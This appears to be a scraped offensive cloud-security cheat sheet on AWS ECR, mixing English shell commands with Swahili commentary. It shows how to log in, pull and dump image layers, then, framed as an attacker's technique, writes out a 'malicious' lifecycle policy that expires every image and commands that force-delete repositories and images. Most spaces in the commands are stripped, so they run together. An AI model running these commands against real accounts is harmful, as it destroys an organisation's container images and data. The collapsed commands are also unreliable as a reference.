# Docker login into ecr## For public repo (always use us-east-1)aws ecr-public get-login-password --region us-east-1 | docker login --username AWS --password-stdin public.ecr.aws/<random-id>
## For private repoaws ecr get-login-password --profile <profile_name> --region <region> | docker login --username AWS --password-stdin <account_id>.dkr.ecr.<region>.amazonaws.com
## If you need to acces an image from a repo if a different account, in <account_id> set the account number of the other account
# Downloaddockerpull<account_id>.dkr.ecr.<region>.amazonaws.com/<img_name>:latest## If you still have the error "Requested image not found"## It might be because the tag "latest" doesn't exit## Get valid tags with:TOKEN=$(aws --profile <profile> ecr get-authorization-token --output text --query 'authorizationData[].authorizationToken')
curl-i-H"Authorization: Basic $TOKEN"https://<account_id>.dkr.ecr.<region>.amazonaws.com/v2/<img_name>/tags/list# Inspect the imagedockerinspectsha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0# Upload (example uploading purplepanda with tag latest)dockertagpurplepanda:latest<account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latestdockerpush<account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latest# Downloading without Docker# List digestsawsecrbatch-get-image--repository-namelevel2 \--registry-id 653711331788 \--image-ids imageTag=latest|jq'.images[].imageManifest | fromjson'## Download a digestawsecrget-download-url-for-layer \--repository-name level2 \--registry-id 653711331788 \--layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a"
Baada ya kupakua picha, unapaswa kuangalia kwa habari nyeti:
Mshambuliaji mwenye ruhusa hizi anaweza kuunda au kubadilisha sera ya mzunguko ili kufuta picha zote katika hifadhi na kisha kufuta hifadhi nzima ya ECR. Hii itasababisha kupoteza picha zote za kontena zilizohifadhiwa katika hifadhi.
bashCopycode#CreateaJSONfilewiththemaliciouslifecyclepolicyecho'{"rules": [{"rulePriority": 1,"description": "Delete all images","selection": {"tagStatus": "any","countType": "imageCountMoreThan","countNumber": 0},"action": {"type": "expire"}}]}'>malicious_policy.json# Apply the malicious lifecycle policy to the ECR repositoryawsecrput-lifecycle-policy--repository-nameyour-ecr-repo-name--lifecycle-policy-textfile://malicious_policy.json# Delete the ECR repositoryawsecrdelete-repository--repository-nameyour-ecr-repo-name--force# Delete the ECR public repositoryawsecr-publicdelete-repository--repository-nameyour-ecr-repo-name--force# Delete multiple images from the ECR repositoryawsecrbatch-delete-image--repository-nameyour-ecr-repo-name--image-idsimageTag=latestimageTag=v1.0.0# Delete multiple images from the ECR public repositoryawsecr-publicbatch-delete-image--repository-nameyour-ecr-repo-name--image-idsimageTag=latestimageTag=v1.0.0